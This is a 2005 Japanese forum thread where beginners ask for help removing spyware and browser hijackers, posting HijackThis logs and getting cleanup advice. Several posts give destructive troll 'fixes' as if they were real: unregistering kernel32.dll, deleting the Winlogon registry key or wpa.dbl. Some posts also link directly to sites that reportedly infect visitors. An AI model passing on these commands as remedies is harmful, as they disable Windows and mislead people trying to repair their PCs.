110 :ひよこ名無しさん:2005/07/30(土) 23:41:36 ID:???
鑑定人さん少ないから今夜は寝た方がいいよ。

111 :66:2005/07/30(土) 23:48:32 ID:vQUTlBEV
>>110
はい。わかりました。
わざわざありがとうございます。

112 :ひよこ名無しさん:2005/07/31(日) 03:01:20 ID:oshrk+vA
無駄なもん多すぎ。
俺なんか15個くらいしか出てこないぞ。

113 :ひよこ名無しさん:2005/07/31(日) 03:07:42 ID:???
2Kだとビックリするほど少ないよなw

114 :ひよこ名無しさん:2005/07/31(日) 03:55:24 ID:???
メーカー製PCならこんなもんジャマイカ。
いらないものアンインスコしてないと。

>>99の上3つはオンラインゲーム関連、
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
はロジクールの自動更新用って事ぐらいしか俺には分からず。

115 :ひよこ名無しさん:2005/07/31(日) 04:50:45 ID:???
>O23 - Service: Apache - Unknown owner - C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice (file missing)

116 : ◆N9P3SuvBPo :2005/07/31(日) 05:09:00 ID:???
>66
とりあえずですね、PCをセーフモードで起動→HijackThisで以下のエントリーにチェックを入れてFIX
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O16はとりあえず全て(必要なものは再度サイトでインストールできます)
O20 - Winlogon Notify: Unimodem - C:\WINDOWS\system32\mwc42loc.dll
O23 - Service: Apache - Unknown owner - C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice (file missing)

セーフモードで再起動して、テンプレ>4の
「5) アンチウィルスソフトでウィルスを除去。」
「6)  ブラウザジャッカーCoolWebSearch駆除ツール」
「7) 定番スパイウェア除去ソフト、Ad-awareSEとSpybotS&Dを使って除去。」
を一気に実行。

ここまでやれば症状の方は、ほぼ収まってくれると思います。
完全に治れば占めたものですが…

117 :ひよこ名無しさん:2005/07/31(日) 06:23:17 ID:???
       , '´         :::::::::::ヽ、
      /     ,/ ||| \,  ::::::::::ヽ
      |   =="       `== ::::::::|
      |   -=・=-′ ヽ-=・=- :::::::::|
      |               ::::::::::|   え?
      |     (_人_)   ::::::::|
       'ヽ__        :::::::::::/

118 :ひよこ名無しさん:2005/07/31(日) 09:01:06 ID:???
C:\WINDOWS\system32\rundll32.exe

これイラネ

119 :ひよこ名無しさん:2005/07/31(日) 15:45:25 ID:lpqGsbPs
多分どっかのサイトに行ってからだと思いますが
ネット中にいきなり
『BullsEye Network Offer』
とかいうものがポップアップされるようになりました。
何処のサイトに行ったらとかではなく、いつでもどこでもいきなりです。
対処法または、これについて知ってる方は居ますか?


120 :ひよこ名無しさん:2005/07/31(日) 16:22:44 ID:???
>>119
テンプレ

121 :66:2005/07/31(日) 16:34:43 ID:n9oX8nr+
いろいろとありがとうございました。
どれをアンインストールしていいか分からなくてしてません…。
無駄なものいっぱいだったみたいですね。

>>116さんのを全てやってみた所、今のところ症状は収まっています。
本当にありがとうございました。

122 :ひよこ名無しさん:2005/08/01(月) 01:25:02 ID:???
●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●

ウイルス対策ソフトの検出力結果
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●

123 :ひよこ名無しさん:2005/08/01(月) 05:55:08 ID:???
>>122
宣伝ウゼー

124 :ひよこ名無しさん:2005/08/01(月) 08:21:01 ID:VoR4C35H
「WinXP Professional SP2 IE6使用」
リンク先を踏むと↓のサイトに飛ばされる事があります。
http://affiliate.dtiserv.com/link/index03.html
100%じゃなくて、普通にリンク先に飛ぶ事もあるのですが、
スパイウエアかなにかでしょうか?
おしえてください。

125 :ひよこ名無しさん:2005/08/01(月) 08:33:03 ID:???
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

126 :ひよこ名無しさん:2005/08/01(月) 13:56:19 ID:YofeyC+V
エロサイトを見てたらあるページで警告が何度も出続けて、IEを閉じることもできなくなってしまったのでタスクマネージャーで閉じました。
そしたら画面がプツッと切れ、起動中の画面になり再起動になってしまいました。
その後、ログインしたと思ったらまた画面が切れ起動中になり、その後ループし続けます。
いつもはログインするなパスワードをかけてたのですが、それすらも無視してループし続けます。
あと、実は、起動時にループする、というのは1週ぐらい前から起きてて(このループはパスワードを無視しないので、別物かも)、それは外付けハードディスクのUSBをつけっぱで起動しようとすると起きる現象だったので、起動時はUSBを外せば問題ありませんでした。

ためしにセーフモードで「前回正常起動時の構成」をやってみても駄目でした

OSはXPです。どうか解決策を教えて下さい

127 :ひよこ名無しさん:2005/08/01(月) 14:00:55 ID:???
>>126
あるけどない リカバリー
fdisk /mbrを実行
fixmbrでは起動しない

128 :126:2005/08/01(月) 15:09:09 ID:YofeyC+V
調べたらコマンドプロンプトで>>127の言うとおりfdisk /mbr実行すろばいい、というのはわかったのですが、セーフモードからコマンドプロンプトを開いてもわけわかんない画面になったあと、またループし初めて、コマンドを実行できません。
できたらコマンドを実行する方法も教えていただけないでしょうか

129 :ひよこ名無しさん:2005/08/01(月) 15:15:46 ID:???
>>128
fdisk /mbr はWin9x系の起動FDで起動しないと実行できない。

130 :ひよこ名無しさん:2005/08/01(月) 15:21:10 ID:???
>>129
;`;:゙;`(;゚;ж;゚; ) プッ

131 :ひよこ名無しさん:2005/08/01(月) 15:23:25 ID:???
>>130
Windows 2000/XP に fdisk はありません
http://homepage2.nifty.com/winfaq/fdiskhowto.html

132 :ひよこ名無しさん:2005/08/01(月) 15:24:22 ID:???
>>131
;`;:゙;`(;゚;ж;゚; ) プッ

133 :ひよこ名無しさん:2005/08/01(月) 15:27:01 ID:???
相手にすんな
何故にfdisk /mbrかも知らねぇんだから

134 :ひよこ名無しさん:2005/08/01(月) 15:47:59 ID:???
エロサイトを見てたらfdisk /mbrだって ( ´,_ゝ`)プッ

135 :126:2005/08/01(月) 15:55:41 ID:YofeyC+V
すいません、もしかしたら自分が勘違いしてたかもしれません
コマンドプロンプトってF8連打して「セーフモードとコマンドプロンプト」でいいのでしょうか?サ色々なイトで調べても「スタートから起動する」みたいなことが書いてあるのですが、もしそうだったらスタートすら開けないので起動できません

136 :ひよこ名無しさん:2005/08/01(月) 16:48:09 ID:???
>>135
FDISK /MBR はそのどちらもでもダメ。
>>129に書いてある通り。

137 : ◆N9P3SuvBPo :2005/08/01(月) 18:07:34 ID:???
>124
有料サイト一覧ですか、んーリンク先を踏むとですか…
どのサイトのリンク先だか。

>126
WindowsXPのログオン画面が表示される前に、無限起動ループってやつ?

138 :ひよこ名無しさん:2005/08/01(月) 18:33:52 ID:w0mSTKhh
Win XP
ポップアップがウザいです。

HighJack Thisを実行して、素人目に分かる一項目をFixしましたが
後は調べても分からないものなので怖くてFixできません。

O4 - HKLM\..\Run: [WindowsRegKey upd4te2d4te] hablgosdz.exe - Unknown
O4 - HKLM\..\Run: [NECEvm] C:\Program Files\NEC\Aio\Shared\Bin\AplEvm12.exe - Unknown
O4 - HKLM\..\Run: [SsAAD.exe] C:\PROGRA~1\Sony\SONICS~1\SsAAD.exe - Possibly nasty
O4 - HKLM\..\RunServices: [WindowsRegKey upd4te2d4te] hablgosdz.exe - Unknown
O4 - HKCU\..\Run: [WindowsRegKey upd4te2d4te] hablgosdz.exe - Unknown

こちらの項目がなんであるか知ってる人いたら教えてください。よろしくお願い致します。

139 :ひよこ名無しさん:2005/08/01(月) 18:41:45 ID:???
>>138
2番目はNECの何か、3番目はSonicStag、
それ以外はあやしい。

140 :ひよこ名無しさん:2005/08/01(月) 18:46:39 ID:w0mSTKhh
>>139
やっぱそれ以外は怪しいですよねぇ。
バックアップ取ってからFixしてみます〜〜。

141 : ◆N9P3SuvBPo :2005/08/01(月) 18:48:31 ID:???
>138
ボットじゃん!
O4 - HKLM\..\Run: [WindowsRegKey upd4te2d4te] hablgosdz.exe - Unknown
O4 - HKLM\..\RunServices: [WindowsRegKey upd4te2d4te] hablgosdz.exe - Unknown
O4 - HKCU\..\Run: [WindowsRegKey upd4te2d4te] hablgosdz.exe - Unknown

ネットから隔離→リカバリするのが基本

142 :ひよこ名無しさん:2005/08/01(月) 21:56:22 ID:w0mSTKhh
>>140
Σ('∀`;)ぇぁっ!

理科張りってことは初期化しろってことれすか?
うそ〜ん・・・。

143 :ひよこ名無しさん:2005/08/01(月) 21:58:08 ID:???
>>142
              __
             /;;;;;;;;;;;;;\
            /;;:::::::::::::::::::::::\
       ∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋
            L::;;,__     ..:::ゝ
          //;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ
          / ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
         /j/三三三三三三三三三三ヾ、
         l::||::::              |l  
        / ̄\ ヽ-=・=-′ヽ-=・=-′ ||  
      r┤    ト::::: \___/     ||     <信じろ!
     /  \_/ ヽ:::.  \/    ,ノ   
      |   _( ̄ l―---oo-――'"ヽ__
      |   _)_ノヽ\  ハ // /    ヽ   
     ヽ____)ノ      ̄ ̄ ̄   /     ヽ、

144 :ひよこ名無しさん:2005/08/01(月) 22:01:26 ID:w0mSTKhh
ノートンのせいでレス番が違うから自分にレスしてもうた。。。
>>141でしたな。

>>143

こわいよー(つД`)

145 :ひよこ名無しさん:2005/08/02(火) 09:31:54 ID:0iclaZuA
OS WindowsXP SP2(HOME)
ブラウザ Opera8.01
セキュリティ関係 ウィルスバスター2005 アドウェアSE spy-bot SpywareBlaster

JAVA_BYTEVER.AとJS_MHTREDIR.PがあるサイトをOperaでうっかり踏んでしまったので
上記のセキュリティソフトを使ってウィルス&スパイ検索してみたのですがなにも出てきませんでした
これってセーフなのでしょうか?


146 :ひよこ名無しさん:2005/08/02(火) 10:12:01 ID:???
うっかり などと言い訳はしないこと。

147 :ひよこ名無しさん:2005/08/02(火) 10:15:05 ID:???
>>145
バカじゃなければIEで踏んでも全然平気

148 :ひよこ名無しさん:2005/08/02(火) 10:16:57 ID:???
>145
セキュリティパッチで対応されていたら、それはもう、
そのパソコンにとってはウィルスでも何でもない。

149 :145:2005/08/02(火) 11:20:51 ID:0iclaZuA
>>146
不覚でしたotz
>>147
・・・・バカかも
>>148
トレンドマイクロのHPで見てみたけどもう対応されてるみたいですね

レスありがとうございました

150 :ひよこ名無しさん:2005/08/02(火) 13:28:45 ID:???
直った!嬉しい・・・
テンプレ1から実行してみたら直りました。
スレの存在自体に感謝します
ありがとうございます

151 : ◆N9P3SuvBPo :2005/08/02(火) 18:21:32 ID:???
>142
【アダルトサイト被害対策の部屋】の質問掲示板でも、
HijackThisのログからボット系ワームに感染していることがわかれば、
識者の方たちは皆、リカバリーしてください。と言っています。

152 :ひよこ名無しさん:2005/08/02(火) 19:36:07 ID:???
     _.,,.ヾ\ヽヽ,,.._
  /:::..           \
 /:::::::::::. ,;'     .:ヾ, ,ゝ  'ヽ 、
 l::::::::.... ヽ-=・=-′ ヽ-=・=- |
 イ:::::::..    '''''' \_/  '''''  i   え?
  ヽ、、,,       V  ,,.._/    
  (^ヽ ゛ ゛      /
  (゛ヽ       リ/)
   ヾvv____ノ
      _L  _L

153 :ひよこ名無しさん:2005/08/02(火) 22:38:56 ID:2FJ9iRcB
よくも騙してくれたな!

パソコンのトラブル解消法(試験版)

WindowsMEorXPはシステムの復元を無効にする
PCをセーフモードで起動する
「スタート」メニューを開いて、ファイルを指名して実行をクリック
以下のコマンドを入力してOKをクリック
OSがWindows98/WindowsMEの場合→regsvr32 /u c:\windows\system\kernel32.dll
OSがWindows2000の場合→regsvr32 /u c:\winnt\system32\kernel32.dll
OSがWindowsXPの場合→regsvr32 /u c:\windows\system32\kernel32.dll
作業終了→PCを通常モードで再起動
問題解決!!(100%解決)→ ウマー(^∀^)

何が問題解決だ?ゴルァ(゜Д゜)!
起動しなくなったぞ!!

154 :ひよこ名無しさん:2005/08/02(火) 22:40:57 ID:???
>>153
>>16

155 :ひよこ名無しさん:2005/08/02(火) 22:51:10 ID:???
100%解決とか書いてあったらまず怪しいと思った方がいいと思うが

156 :ひよこ名無しさん:2005/08/02(火) 22:54:07 ID:???
:::::;::::          ヽ       ノ  │
:::::::::             ̄-   - ̄ .  │
:::::::                 ̄ ̄      │
::::::           ミミミミミミミ   ミミミミミ│
::::    ───〓──────〓〓─────〓
 ── ̄ ̄     │/ ̄●\ /  │〆 ̄●ヽ  │
ヽ        ⌒⌒\ヽ───ノ /│ │───> .│
ヽ          〆   ̄ ̄ ̄ ̄ │ │ \──/
 \.                   │  │     │         / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 │  ..                     │    │        /
 .│  . .            ─/     ヽ    /      <  ホームラン級のバカだな
  │            /   \⌒\  ノ\ . /        \
\/ヽ          /             \. /          \
   │\     │  │ <── ̄ ̄ ̄──). /             ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   │ ヽ    │  \  \++++++/ /
   .│       \     \────/  /
   /   \          (────ノ  /
  /│    \                . /\
 / │      \      <──── /│\
ノ  │        \           / │ \
   │          \        /  │  \
   │             ̄ ̄ ̄ ̄    │    ̄\──

157 :ひよこ名無しさん:2005/08/02(火) 23:28:46 ID:???
よし 新しいトラブル解決法だ
パソコンをセーフモードで起動したら、
C:\WINDOWS\system32\wpa.dblを削除する。
XPだけが出来るリカバリー方法だ。

158 :ひよこ名無しさん:2005/08/03(水) 00:39:17 ID:???
test

159 :ひよこ名無しさん:2005/08/03(水) 01:45:34 ID:???
>>157
認証ファイル消してどうするw

160 :ひよこ名無しさん:2005/08/03(水) 02:06:27 ID:???
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

これは一発で直るぞ
XPでこのレジストリキーがある人は最新のキンタマウィルスに感染している
早く右クリックしてキーごと削除して再起動しとけよ

161 :ひよこ名無しさん:2005/08/03(水) 02:10:29 ID:???
「一発」や「100%」は詐欺師がよく使うセリフ。

162 :ひよこ名無しさん:2005/08/03(水) 14:52:53 ID:XF0P+Jxi
MeでIE6です
IEのツールバーにremove toolbarが入ったので
spybots Ver1.4をしていくつかひっかかったのを削除しました
ブラウザのツールバーは正常になりました
その他特に動作がおかしいこともありません。

しかしオンラインウイルススキャンをすると
シマンテックではSYSTEM\sudww.dllにAdware.FastLookがひっかかります。
ウイルスバスター、cwshredder、再度のspybotsでは何もでません。

これはまだ残っているのでしょうか。また、完全な削除方法を教えてください。

163 :ひよこ名無しさん:2005/08/03(水) 15:14:43 ID:???
>>162
fdisk /mbrを実行

164 :ひよこ名無しさん:2005/08/03(水) 15:20:13 ID:???
>>162
ノートン買いなさい。

165 :ひよこ名無しさん:2005/08/03(水) 15:24:09 ID:???
>>162
そんならセーフモードでそれを削除

166 :ひよこ名無しさん:2005/08/03(水) 18:41:08 ID:SgDqtSAv
トップページが
http://balabolka.biz/start.html
に変わっちゃって、テンプレにあるようにしたんですけど、もとに戻りません・・・
どうすればいいんでしょうか・・・

167 : ◆N9P3SuvBPo :2005/08/03(水) 19:58:32 ID:???
>166
テンプレはやったんだよね?

…とりあえずHijackThisのログを

168 :ひよこ名無しさん:2005/08/03(水) 22:20:56 ID:avHTff+a
これを開いたらウイルスがあるようです もちろん開いてしましました どうすればいいでしょうか?
ttp://www.msn.co.jp/home.armx
あと、2chやっててURL開いたら変なソフトDLさせられました (たぶん上のサイトと関係あると思います)
消してもショートカットの削除しかできなく、消しても消しても出てきます
しかも、ネットやってたら赤い変な外国のサイトに乗っ取られて勝手に消えるんだ(上のサイト)
どうすれば良いでしょうか? ちなみにそのソフト?はHotって言います アイコンは外人の女の顔です


169 :ひよこ名無しさん:2005/08/03(水) 22:26:21 ID:???
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

170 :162:2005/08/03(水) 23:01:13 ID:???
ありがとうございました。

>>163それはようするに残りカスをリフレッシュで消すことですか?
>>164ノートン重いので迷ってます。
>>165sudww.dllをですか。そんな簡単に削除しちゃっていいんですか!?

171 :ひよこ名無しさん:2005/08/03(水) 23:39:01 ID:hkHeOF50
tp://ime.st/www.grannymax.com/index1.shtml
踏んでしまいました。踏むだけでウイルスにかかるサイトみたいです。
IE6、アンチウイルス等のソフトはありません。
症状:IE起動は普通にできるのですが、
しょっちゅう何かのダウンロードをほのめかすポップアップが出てきたり、
ホームのぺージを勝手に変えられてしまいます。直しても何度でも。。。
よろしくお願いします。

172 :ひよこ名無しさん:2005/08/04(木) 00:03:47 ID:???
>>171
WindowsUpdateもしない人は飽きるまで何度でも感染してくださいな

173 :ひよこ名無しさん:2005/08/04(木) 10:41:10 ID:FATSNqU8
Jane Doe Styleで
このスレッドを見たらノートンが、 Unix.Penguin を検出しました。
私のパソコンは、何かのウイルスに感染してるのですか?

174 :ひよこ名無しさん:2005/08/04(木) 10:48:37 ID:???
>>173
>>60に誤反応コードが貼られてるから

175 :ひよこ名無しさん:2005/08/04(木) 11:25:10 ID:+vRDyFww
質問です。
えっと、ネットでチョトエチィサイトをのぞいておわってみたら
デスクトップになんかしらないアイコン出てきてて
捨てようとしたらダブクリしてしまって
壁紙がWORNIG!!とかいうのになって
スパイウェアが〜みたいなことが英語で書いてあって
変なソフトが勝手に起動しておりますorz
わからないので起動したソフトはひたすらバツをクリックして消してます。

176 :ひよこ名無しさん:2005/08/04(木) 11:28:25 ID:???
>>175
うっせえハゲ。

177 :ひよこ名無しさん:2005/08/04(木) 12:17:35 ID:KvwaM3cf
このスレッドを見て自分で出来ることは、やり終えました。
あと、どうすればいいのか教えてください。

Logfile of HijackThis v1.99.1
Scan saved at 11:56:09, on 2005/08/04
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\AdvTools\NPROTECT.EXE
C:\Program Files\Norton AntiVirus\SAVScan.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Fujitsu\iNetConDsp\iNetConDsp.exe
C:\Program Files\Fujitsu\BATTERYAID\BATTERYAID.exe
C:\WINDOWS\system32\yacpower.exe
C:\Program Files\Fujitsu\IndicatorUtility\IndicatorUty.exe

178 :ひよこ名無しさん:2005/08/04(木) 12:22:22 ID:q4Y+ouQg
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\svchost.exe
C:\Downloads\Doe203\Jane2ch.exe
C:\WINDOWS\SYSTEM32\irvine1_0_9\irvine.exe
C:\Documents and Settings\既定\デスクトップ\HijackThis.exe

O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [INETCONDSP] C:\Program Files\Fujitsu\iNetConDsp\iNetConDsp.exe
O4 - HKLM\..\Run: [BATTERYAID] C:\Program Files\Fujitsu\BATTERYAID\BATTERYAID.exe
O4 - HKLM\..\Run: [YAMAHA AC-XG Power Utility] yacpower.exe
O4 - HKLM\..\Run: [IndicatorUtility] C:\Program Files\Fujitsu\IndicatorUtility\IndicatorUty.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [Advanced Tools Check] C:\PROGRA~1\NORTON~2\AdvTools\ADVCHK.EXE
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /Consumer
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [dE3JeMdb4] C:\WINDOWS\dupxo.exe
O4 - HKLM\..\Run: [dE0eMdb4] C:\WINDOWS\dupxo.exe
O4 - HKLM\..\Run: [dE0xーMdb4kg:^#Nb化9C:\Program Files\ISTsvc\istsvc.exe] C:\WINDOWS\dupxo.exe


179 :ひよこ名無しさん:2005/08/04(木) 12:24:08 ID:q4Y+ouQg
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: Bookshelfで検索(&L) - res://C:\PROGRAM FILES\MICROSOFT REFERENCE\MICROSOFT BOOKSHELF 3.0\BSDEF.DLL/#1001
O8 - Extra context menu item: Irvineですぐにダウンロード - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu10.htm
O8 - Extra context menu item: Irvineでキューフォルダを選択してダウンロード - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu9.htm
O8 - Extra context menu item: Irvineでコメント付きダウンロード登録 - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu7.htm
O8 - Extra context menu item: Irvineでダウンロード - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu1.htm
O8 - Extra context menu item: Irvineでリンクのインポート - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu6.htm
O8 - Extra context menu item: Irvineで保存先を指定してダウンロード - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu4.htm
O8 - Extra context menu item: Irvineで設定して登録 - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu8.htm
O8 - Extra context menu item: Irvineで選択範囲をダウンロード - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu3.htm
O8 - Extra context menu item: IrvineへすべてのURLを送る - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu2.htm
O8 - Extra context menu item: IrvineへすべてのURLを送る(IMGを含む) - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu5.htm
O8 - Extra context menu item: Irvineへ登録 - C:\WINDOWS\SYSTEM32\irvine1_0_9\ie_menu\iemenu11.htm
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~1\OFFICE10\EXCEL.EXE/3000
O9 - Extra button: Messenger - ;{FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - ;{FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file)



180 :ひよこ名無しさん:2005/08/04(木) 12:25:05 ID:q4Y+ouQg
O15 - Trusted Zone: http://ny.contentmatch.net (HKLM)
O16 - DPF: Yahoo! Chat JP - http://cs.chat.yahoo.co.jp/c214/chat.cab
O16 - DPF: Yahoo! Chat JP 2 - http://cs.chat.yahoo.co.jp/c304/chat.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{4B66B5C1-CE75-402E-A92E-E5D2179EF24F}: NameServer = 61.122.241.179 61.122.241.180
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: EPSON Printer Status Agent2 (EPSONStatusAgent2) - SEIKO EPSON CORPORATION - C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
O23 - Service: FanSpeedNT Service - Unknown owner - C:\Downloads\FanSpeed1_2_0\fanspeedNT.exe" (file missing)
O23 - Service: Norton AntiVirus Auto Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exe
O23 - Service: Norton Unerase Protection (NProtectService) - Symantec Corporation - C:\Program Files\Norton AntiVirus\AdvTools\NPROTECT.EXE
O23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe




181 :ひよこ名無しさん:2005/08/04(木) 12:26:00 ID:q4Y+ouQg
O23 - Service: Windows Distributed Client (Win32DistributedClient) - Unknown owner - C:\windows\system32\msidrv.exe (file missing)


以上です。よろしくお願いします。


182 :ひよこ名無しさん:2005/08/04(木) 13:47:05 ID:???
http://www.grannymax.com/index1.shtml
ここを踏んでしまいました。
IEを起動するとエラーになって強制的に終了されてしまいます。
どなたかお願いします。

183 :ひよこ名無しさん:2005/08/04(木) 13:49:18 ID:???
>>182
直リンすんなボケ!
誰かがうっかりクリックしたらどうするんだ!
テンプレ読め!

184 :182:2005/08/04(木) 14:04:20 ID:???
>>183すいません。かなり焦ってました。


185 :ひよこ名無しさん:2005/08/04(木) 14:14:22 ID:NG1OKp1g
>>182
俺も踏みました・・・どなたかお願いします!
SPY PODでやってみたんですが、5、60個ぐらい見つかります。
それで消して、2個ぐらい残るんですが、再起動するとまた復活してIEがおかしくなります。。

186 :ひよこ名無しさん:2005/08/04(木) 14:28:58 ID:???
てめえらの空っぽのドタマの中には再インストールするって考えはねえのか?
ドアほどもが
直せるのはわかりきっているやつらだけだ。

187 :a:2005/08/04(木) 14:35:28 ID:???
ad

188 :ひよこ名無しさん:2005/08/04(木) 14:37:49 ID:???
>>185
自演すんな

189 :ひよこ名無しさん:2005/08/04(木) 14:43:19 ID:NG1OKp1g
>>186
自作で、更に貰い物なのでインストールディスクすらないので困っております。
>>188
なんの自演ですか?

190 :ひよこ名無しさん:2005/08/04(木) 14:47:34 ID:???
>>189
一生困ってろ
使用ライセンスなしクン

191 :ひよこ名無しさん:2005/08/04(木) 14:49:31 ID:NG1OKp1g
もういいです。去年はこんな人ばっかりじゃなかったんですがね。どうしたんでしょう?
のっとったんでしょうか。

192 :ひよこ名無しさん:2005/08/04(木) 14:52:43 ID:???
>>191
おまえのはIDからしてNGですからーーー。残念!

193 :ひよこ名無しさん:2005/08/04(木) 14:52:50 ID:AxAAxjrh
おれも182にひっかかって今大変

初心者サイトなのにね・・・・ここ
まぁ予想はしてたけど

194 :ひよこ名無しさん:2005/08/04(木) 14:53:17 ID:???
>>189
問題ないみたいだな。
http://www.geocities.co.jp/Playtown-Bingo/6759/index1.htm

195 :ひよこ名無しさん:2005/08/04(木) 15:05:56 ID:NG1OKp1g
>>194は行って大丈夫なんですかね・・・・?

196 :ひよこ名無しさん:2005/08/04(木) 15:12:14 ID:???
>>182がどうかしたか?ウィルスなんて何も出ねえぞ
Windows Updateは全部適用してるがな

197 :ひよこ名無しさん:2005/08/04(木) 15:14:19 ID:NG1OKp1g
>>194は調べたら危険っぽいです。
助けるスレでまた危険な目にあわせるんですね。
きっといい死に方しないでしょうね

198 :ひよこ名無しさん:2005/08/04(木) 15:28:51 ID:???
>>194がどうかしたか?
何も出ねえぞ

199 :ひよこ名無しさん:2005/08/04(木) 15:29:07 ID:???
>>194
RedlofとJS_PSYME発見

>>194は踏まないように

200 :ひよこ名無しさん:2005/08/04(木) 15:34:01 ID:???
ああ>>194はRedlolfに感染しているわ
でも、こんなのに今時誰も感染しないぞ
MS VitialMachineの三年前の脆弱性だ
XPはSP1aになって、VitialMachineさえインストールされていないやつの方が大多数だろう
感染なんてしねえよ

201 :ひよこ名無しさん:2005/08/04(木) 15:34:08 ID:???
>>197
君はOS不正使用の疑いあり
さっさと正規版買ってくるよろし

